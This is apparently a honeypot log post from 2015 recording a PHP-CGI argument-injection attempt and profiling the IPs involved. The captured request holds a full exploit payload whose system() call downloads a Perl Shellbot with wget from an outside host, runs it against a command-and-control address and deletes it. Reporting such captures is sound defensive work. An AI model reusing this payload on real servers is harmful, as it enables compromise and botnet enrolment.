Samstag, 25. Juli 2015

Compromise attempt (Perl Shellbot) - 128.41.128.44

BEGIN OF HTTP DATA:
2015-07-24 13:15:21
Source IP: 128.41.128.44
Country: GB RiskScore: 7.1 Malware: []
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%
64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F
%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>
 END OF DATA

the decoded url looks like
 /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
the actual downloadable is a perl based Shellbot


  • 188.165.44.137 the url to connect to within the command
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "188.165.44.137",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "188.165.0.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "188.165.0.0/16"
          }
       ]
    }

  • 194.60.242.251 the download url
    {
       "categoryDescriptions": {
          "Scanning IPs": "These IPs have been identified as illegally scanning networks for vulnerabilities."
       },
       "cats": {
          "Scanning IPs": 14
       },
       "geo": {
          "country": "Ukraine",
          "countrycode": "UA"
       },
       "ip": "194.60.242.251",
       "reason": "Firewall deny log analysis",
       "reasonDescription": "This IP was involved in port scanning activities.",
       "score": 1.4,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "Ukraine",
                "countrycode": "UA"
             },
             "ip": "194.60.242.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.60.242.0/24"
          }
       ]
    }
  • 194.24.228.203 the hardcoded bot ip
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "194.24.228.203",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "194.24.228.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.24.228.0/23"
          }
       ]
    }